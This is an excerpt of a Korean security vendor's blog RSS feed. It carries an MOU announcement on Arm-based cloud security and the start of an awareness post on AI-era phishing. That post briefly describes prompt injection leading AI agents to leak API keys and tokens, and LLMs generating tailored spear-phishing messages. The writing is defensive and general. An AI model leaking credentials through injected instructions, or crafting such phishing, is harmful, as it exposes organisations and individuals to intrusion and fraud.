&lt;p id=&quot;SE-f19a3967-67bf-4452-b6b5-e33430b7f30d&quot; style=&quot;text-align: left;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>PC백신</category>
      <category>PC보안</category>
      <category>무료백신</category>
      <category>백신프로그램</category>
      <category>알약</category>
      <category>이스트시큐리티</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5697</guid>
      <comments>https://alyacofficialblog.tistory.com/5697#entry5697comment</comments>
      <pubDate>Wed, 7 Jan 2026 10:54:57 +0900</pubDate>
    </item>
    <item>
      <title>AX 시대, Arm 기반 클라우드 보안의 새로운 기준을 만들다! - 이스트시큐리티&amp;middot;엑세스랩 MOU 소식</title>
      <link>https://alyacofficialblog.tistory.com/5696</link>
      <description>&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;AI와 클라우드 기술이 빠르게 고도화되며 기업 IT 환경은 그 어느 때보다 복잡해지고 있습니다. 특히 AX(AI Transformation) 시대를 맞아, AI&amp;middot;클라우드 인프라 전반을 안정적으로 보호할 수 있는 차세대 보안 기술에 대한 요구도 함께 높아지고 있습니다. 이러한 흐름 속에서 이스트시큐리티는 Arm 서버 기술 선도기업인 엑세스랩과 손잡고, Arm 기반 클라우드 보안 기술 공동 개발을 위한 전략적 업무 협약(MOU)을 체결했습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이번 협약은 지난 1월 5일, 서울 서초구 이스트시큐리티 본사에서 진행되었으며, 이스트시큐리티 김병훈&lt;span style=&quot;color: #333333;&quot;&gt; CTO와 엑세스랩 유명환&amp;nbsp;&lt;/span&gt;대표가 참석해 양사 간 기술 협력의 방향성과 비전을 공유했습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;2026_이스트시큐리티-엑세스랩 MOU 1.png&quot; data-origin-width=&quot;1200&quot; data-origin-height=&quot;861&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/0LJ1d/dJMcafedAIC/rKyzxkepJ2KY2h0bLyJp40/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/0LJ1d/dJMcafedAIC/rKyzxkepJ2KY2h0bLyJp40/img.png&quot; data-alt=&quot;[사진] 김병훈 이스트시큐리티 CTO와 유명환 엑세스랩 대표&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/0LJ1d/dJMcafedAIC/rKyzxkepJ2KY2h0bLyJp40/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2F0LJ1d%2FdJMcafedAIC%2FrKyzxkepJ2KY2h0bLyJp40%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1200&quot; height=&quot;861&quot; data-filename=&quot;2026_이스트시큐리티-엑세스랩 MOU 1.png&quot; data-origin-width=&quot;1200&quot; data-origin-height=&quot;861&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[사진] 김병훈 이스트시큐리티 CTO와 유명환 엑세스랩 대표&lt;/figcaption&gt;
&lt;/figure&gt;
&lt;/p&gt;
&lt;p style=&quot;text-align: center;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #006dd7;&quot;&gt;&lt;b&gt;AX 시대, Arm 기반 클라우드 보안을 위한 전략적 협력&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이번 협업의 핵심은 &lt;b&gt;Arm 아키텍처 기반 인프라 환경에서 동작하는 다양한 AX 워크로드를 포괄적으로 보호하는 프라이빗 클라우드 특화 보안 기술 개발입니다.&lt;/b&gt; 물리 서버와 가상 머신은 물론, 컨테이너 환경, AI&amp;middot;LLM 추론 노드까지 포함한 복합적인 클라우드 워크로드를 하나의 보안 체계로 관리&amp;middot;보호하는 것이 목표입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;양사는 이를 위해 워크로드 취약점 탐지, 실시간 위협 모니터링, 사용자&amp;middot;권한 관리 고도화, 트러스트 기반 보안 정책 강화, 규제 준수 및 컴플라이언스 자동화 등 클라우드 보안의 핵심 요소를 중심으로 기술 협력을 본격화할 계획입니다. 점점 복잡해지는 클라우드 환경에서도 보안 사각지대를 최소화하고, 선제적인 위협 대응이 가능한 체계를 구축하는 데 초점을 맞추고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #006dd7;&quot;&gt;&lt;b&gt;알약 엔진 기반, Arm 아키텍처 최적화 보안 기술 고도화&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;이스트시큐리티는 이번 협업을 통해 자사의 핵심 보안 자산인 &amp;lsquo;알약&amp;rsquo; 백신 엔진을 중심으로, 엔드포인트&amp;middot;클라우드&amp;middot;워크로드 보안 기술과 위협 인텔리전스 역량을 Arm 아키텍처에 최적화해 나갈 방침입니다. 특히 국내 환경에 특화된 탐지 기술과 축적된 보안 노하우를 바탕으로, 글로벌 솔루션과 차별화된 클라우드 보안 경쟁력을 강화해 나갈 계획입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;엑세스랩 역시 20년간 축적해 온 임베디드 및 풀스택 엔터프라이즈 컴퓨팅 기술을 기반으로, Arm 서버 마더보드 설계&amp;middot;제조부터 펌웨어, 클러스터 운영 소프트웨어까지 전 영역에서 확보한 기술력을 이번 협업에 적극 활용합니다. 보안 플랫폼과 연계된 인프라&amp;middot;운영 데이터를 제공하고, 실환경에 최적화된 통합 보안 솔루션을 공동으로 선보인다는 구상입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #006dd7;&quot;&gt;&lt;b&gt;클라우드 보안 전반으로 확장되는 공동 사업&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #333333; text-align: start;&quot;&gt;양사는 향후 프라이빗 클라우드 사용자 권한 관리(CIEM), Arm 기반 보안 제품 포팅, 산업&amp;middot;공공&amp;middot;교육 분야를 아우르는 공동 프로젝트 추진 등 클라우드 보안 전반에 걸친 협력을 단계적으로 확대해 나갈 예정입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #eeeeee; padding: 10px; border: 1px solid #c1c1c1;&quot;&gt;
&lt;ul style=&quot;list-style-type: disc;&quot; data-ke-list-type=&quot;disc&quot;&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;프라이빗 클라우드 사용자 권한 관리(CIEM)&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;Arm 기반 보안 제품 포팅&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;산업&amp;middot;공공&amp;middot;교육 분야 공동 프로젝트 추진&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;단순 기술 협력을 넘어, 실제 고객 환경에서 활용 가능한 통합 보안 모델을 구축하는 것이 이번 MOU의 중요한 목표입니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;엑세스랩 측은 &amp;ldquo;이번 협업을 통해 Arm 기반 인프라와 보안 기술이 유기적으로 결합된 새로운 클라우드 보안 모델을 제시하겠다&amp;rdquo;며 &amp;ldquo;고객과 파트너가 신뢰할 수 있는 안정적인 AX 환경 구축에 최선을 다하겠다&amp;rdquo;고 밝혔습니다.&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;blockquote data-ke-style=&quot;style3&quot;&gt;이스트시큐리티 김병훈 CTO는 &amp;ldquo;이번 협업은 오픈 이노베이션의 범위를 클라우드&amp;middot;AI 인프라 영역까지 확장하는 중요한 계기&amp;rdquo;라며 &amp;ldquo;양사의 상호 보완적인 기술 통합을 통해 차세대 클라우드 보안 생태계 구축에 기여하고, 국내외 고객에게 더욱 견고한 보안 서비스를 제공해 나가겠다&amp;rdquo;고 전했습니다.&lt;/blockquote&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;국민 백신 &amp;lsquo;알약&amp;rsquo;을 기반으로 국내 엔드포인트 보안 시장을 선도해 온 이스트시큐리티는, 이번 협력을 계기로 클라우드와 워크로드 보안 영역까지 기술적 저변을 더욱 확장해 나가고 있습니다. AX 시대에 요구되는 새로운 보안 기준을 제시하며, 변화하는 IT 환경 속에서도 신뢰할 수 있는 보안 파트너로 자리매김해 나가겠습니다.&lt;/span&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;</description>
      <category>이스트시큐리티 소식</category>
      <category>ai워크로드</category>
      <category>arm</category>
      <category>ax시대</category>
      <category>VM보안</category>
      <category>알약</category>
      <category>엑세스랩</category>
      <category>엔드포인트보안</category>
      <category>이스트시큐리티</category>
      <category>클라우드보안</category>
      <category>프라이빗클라우드</category>
      <author>알약5</author>
      <guid isPermaLink="true">https://alyacofficialblog.tistory.com/5696</guid>
      <comments>https://alyacofficialblog.tistory.com/5696#entry5696comment</comments>
      <pubDate>Tue, 6 Jan 2026 10:00:33 +0900</pubDate>
    </item>
    <item>
      <title>피싱 공격의 진화, 다음 타깃은 우리 가족일 수 있습니다</title>
      <link>https://alyacofficialblog.tistory.com/5695</link>
      <description>&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p style=&quot;text-align: right;&quot; data-ke-size=&quot;size14&quot;&gt;&lt;span style=&quot;font-family: 'Noto Sans Light'; background-color: #eeeeee; color: #333333; text-align: start;&quot;&gt;by 이스트시큐리티 마케팅팀&lt;/span&gt;&lt;/p&gt;
&lt;p style=&quot;color: #333333; text-align: start;&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-2c84abcd-f6b4-4f77-830b-0b85f66a99db&quot; data-a11y-title=&quot;본문&quot; data-compid=&quot;SE-2c84abcd-f6b4-4f77-830b-0b85f66a99db&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-2c84abcd-f6b4-4f77-830b-0b85f66a99db&quot; data-unitid=&quot;&quot;&gt;
&lt;div id=&quot;SE-1e736f19-2a69-42c8-b9e1-1dc2a579dfbb&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;안녕하세요, 이스트시큐리티입니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;2025년 들어 AI 기술이 빠르게 확산되면서 피싱 공격 역시 과거와는 전혀 다른 양상으로 진화하고 있습니다. 이메일을 넘어 문자(SMS), 메신저, SNS, 가짜 앱 등 다양한 채널을 통해 정교한 사회공학 기법이 동원되고 있으며, 공격의 속도와 정밀도 또한 눈에 띄게 향상되고 있습니다. 실제로 DeepStrike가 발표한 2025년 보고서에 따르면 AI 기반 피싱&amp;middot;사칭형 공격은 전년 대비 1,265% 증가했으며, 이에 따른 사용자 피해 규모 역시 지속적으로 확대되고 있는 것으로 나타났습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;이번 콘텐츠에서는 AI 시대에 특히 주목해야 할 주요 피싱 위협이 어떻게 변화하고 있는지, 그리고 개인과 가족이 실생활에서 적용할 수 있는 대응 전략은 무엇인지 차근차근 살펴보고자 합니다. 빠르게 고도화되는 보안 환경 속에서 위협의 흐름을 이해하고 선제적으로 대비하는 것이 무엇보다 중요해지고 있습니다.&lt;/p&gt;
&lt;p id=&quot;SE-33227cfb-e65f-420b-8b70-1e0830352bc9&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p id=&quot;SE-d1b7469b-a632-4162-b1c6-49be11713213&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-509fba4f-c60d-49e0-891e-1562c7e084fb&quot; data-a11y-title=&quot;사진&quot; data-compid=&quot;SE-509fba4f-c60d-49e0-891e-1562c7e084fb&quot;&gt;
&lt;div&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-509fba4f-c60d-49e0-891e-1562c7e084fb&quot; data-unitid=&quot;&quot;&gt;
&lt;div&gt;
&lt;div id=&quot;SE-509fba4f-c60d-49e0-891e-1562c7e084fb&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;&quot; data-unitid=&quot;SE-509fba4f-c60d-49e0-891e-1562c7e084fb&quot;&gt;&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-filename=&quot;Group 2034384081.png&quot; data-origin-width=&quot;1408&quot; data-origin-height=&quot;786&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/bdglre/dJMcaiIHeDq/b5pAk7avMu6ablDJca2Ekk/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/bdglre/dJMcaiIHeDq/b5pAk7avMu6ablDJca2Ekk/img.png&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/bdglre/dJMcaiIHeDq/b5pAk7avMu6ablDJca2Ekk/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2Fbdglre%2FdJMcaiIHeDq%2Fb5pAk7avMu6ablDJca2Ekk%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1408&quot; height=&quot;786&quot; data-filename=&quot;Group 2034384081.png&quot; data-origin-width=&quot;1408&quot; data-origin-height=&quot;786&quot;/&gt;&lt;/span&gt;&lt;/figure&gt;
&lt;/div&gt;
&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif;&quot;&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-794d8abd-4b23-4452-9a94-04c3c175ed92&quot; data-a11y-title=&quot;본문&quot; data-compid=&quot;SE-794d8abd-4b23-4452-9a94-04c3c175ed92&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-794d8abd-4b23-4452-9a94-04c3c175ed92&quot; data-unitid=&quot;&quot;&gt;
&lt;div id=&quot;SE-d8b20420-753e-4c2b-b579-2a834a321079&quot;&gt;
&lt;p id=&quot;SE-eb5603be-5159-417e-840f-e844e9ba4de9&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p id=&quot;SE-7ff53a11-9d71-4c66-9953-f6df8072c47f&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3 data-ke-size=&quot;size23&quot;&gt;&lt;span style=&quot;font-family: AppleSDGothicNeo-Regular, 'Malgun Gothic', '맑은 고딕', dotum, 돋움, sans-serif; color: #006dd7;&quot;&gt;&lt;b&gt;AI가 만든 새로운 피싱 공격 트렌드&lt;/b&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;hr contenteditable=&quot;false&quot; data-ke-type=&quot;horizontalRule&quot; data-ke-style=&quot;style6&quot; /&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;현재 고도화되고 있는 피싱 공격 방식은 크게 세 가지 흐름으로 정리할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;&lt;b&gt;  &lt;/b&gt;프롬프트 인젝션과 NHI 탈취 - MFA까지 우회하는 신종 피싱 공격 방식&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-069e4f9e-4039-4cba-a07b-5a83b07afdb5&quot; data-a11y-title=&quot;본문&quot; data-compid=&quot;SE-069e4f9e-4039-4cba-a07b-5a83b07afdb5&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-069e4f9e-4039-4cba-a07b-5a83b07afdb5&quot; data-unitid=&quot;&quot;&gt;
&lt;div id=&quot;SE-7d6a4867-9987-4aa7-9fc0-3e8668f5a0f9&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;AI 에이전트가 기업과 개인의 업무 자동화를 지원하는 동시에, 공격자들은 이제 사람의 계정보다 AI가 가진 디지털 신원, 즉 NHI(Non-Human Identity)를 주요 공격 대상으로 삼고 있습니다. 프롬프트 인젝션 공격은 단순히 AI 모델을 오작동시키는 수준을 넘어, LLM이 접근 가능한 API 키나 서비스 계정, 정적 토큰을 탈취해 내부 시스템으로 직접 침투하는 방식으로 진화하고 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;figure class=&quot;imageblock alignCenter&quot; data-ke-mobileStyle=&quot;widthOrigin&quot; data-origin-width=&quot;1562&quot; data-origin-height=&quot;390&quot;&gt;&lt;span data-url=&quot;https://blog.kakaocdn.net/dn/dQXDgh/dJMcahwhX63/KGBUbKbwrCIOoauNGP9Uw0/img.png&quot; data-phocus=&quot;https://blog.kakaocdn.net/dn/dQXDgh/dJMcahwhX63/KGBUbKbwrCIOoauNGP9Uw0/img.png&quot; data-alt=&quot;[표] NHI 탈취형 공격과 기존 공격의 차이&quot;&gt;&lt;img src=&quot;https://blog.kakaocdn.net/dn/dQXDgh/dJMcahwhX63/KGBUbKbwrCIOoauNGP9Uw0/img.png&quot; srcset=&quot;https://img1.daumcdn.net/thumb/R1280x0/?scode=mtistory2&amp;fname=https%3A%2F%2Fblog.kakaocdn.net%2Fdn%2FdQXDgh%2FdJMcahwhX63%2FKGBUbKbwrCIOoauNGP9Uw0%2Fimg.png&quot; onerror=&quot;this.onerror=null; this.src='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png'; this.srcset='//t1.daumcdn.net/tistory_admin/static/images/no-image-v1.png';&quot; loading=&quot;lazy&quot; width=&quot;1562&quot; height=&quot;390&quot; data-origin-width=&quot;1562&quot; data-origin-height=&quot;390&quot;/&gt;&lt;/span&gt;&lt;figcaption&gt;[표] NHI 탈취형 공격과 기존 공격의 차이&lt;/figcaption&gt;
&lt;/figure&gt;

&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;AT&amp;amp;T를 포함한 글로벌 기업들의 AI 보안 사례에서도 이러한 AI 에이전트 및 자동화 계정에 과도한 권한이 부여된 구조가 핵심 위험 요인으로 반복해서 지적되고 있습니다. 특히 NHI는 비밀번호나 MFA 인증 없이 API 키나 토큰만으로 접근하는 경우가 많아, 한 번 탈취될 경우 기존 사용자 계정보다 더 빠르고 광범위하게 권한이 악용될 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;span style=&quot;font-family: -apple-system, BlinkMacSystemFont, 'Helvetica Neue', 'Apple SD Gothic Neo', Arial, sans-serif; letter-spacing: 0px;&quot;&gt;이처럼 NHI를 노린 공격은 앞으로 모든 보안 체계에서 반드시 고려해야 할 핵심 위협으로 평가되고 있습니다.&lt;/span&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div id=&quot;SE-fb1fbd96-e522-4cfd-8193-7c0fdd4d17c8&quot; data-a11y-title=&quot;본문&quot; data-compid=&quot;SE-fb1fbd96-e522-4cfd-8193-7c0fdd4d17c8&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-fb1fbd96-e522-4cfd-8193-7c0fdd4d17c8&quot; data-unitid=&quot;&quot;&gt;
&lt;div id=&quot;SE-645860d5-1153-471e-a116-618a537b4149&quot;&gt;
&lt;p id=&quot;SE-ce8ad412-7c05-4cc2-b962-ee82e8da0025&quot; data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div class=&quot;txc-textbox&quot; style=&quot;background-color: #e7fdb5; padding: 10px; border: 1px solid #e7fdb5;&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&lt;b&gt;  AI 기반 스피어피싱 자동화 - LLM이 만든 초정밀 피싱의 등장&lt;/b&gt;&lt;/p&gt;
&lt;/div&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
&lt;div id=&quot;SE-0f0b2212-5535-491b-b670-74a7565dc931&quot; data-a11y-title=&quot;본문&quot; data-compid=&quot;SE-0f0b2212-5535-491b-b670-74a7565dc931&quot;&gt;
&lt;div data-direction=&quot;top&quot; data-compid=&quot;SE-0f0b2212-5535-491b-b670-74a7565dc931&quot; data-unitid=&quot;&quot;&gt;
&lt;div id=&quot;SE-c45a5426-bd91-474b-b6ba-8ce3f9aab098&quot;&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;생성형 AI는 스피어피싱 공격의 효율성과 성공률을 획기적으로 끌어올리고 있습니다. 과거에는 공격자가 직접 타깃을 조사하고 문구를 작성해야 했다면, 이제 LLM은 공개 프로필과 최근 활동, 직무 정보, 관심사 등을 분석해 피해자가 속기 쉬운 메시지를 자동으로 생성할 수 있습니다.&lt;/p&gt;
&lt;p data-ke-size=&quot;size16&quot;&gt;&amp;nbsp;&lt;/p&gt;
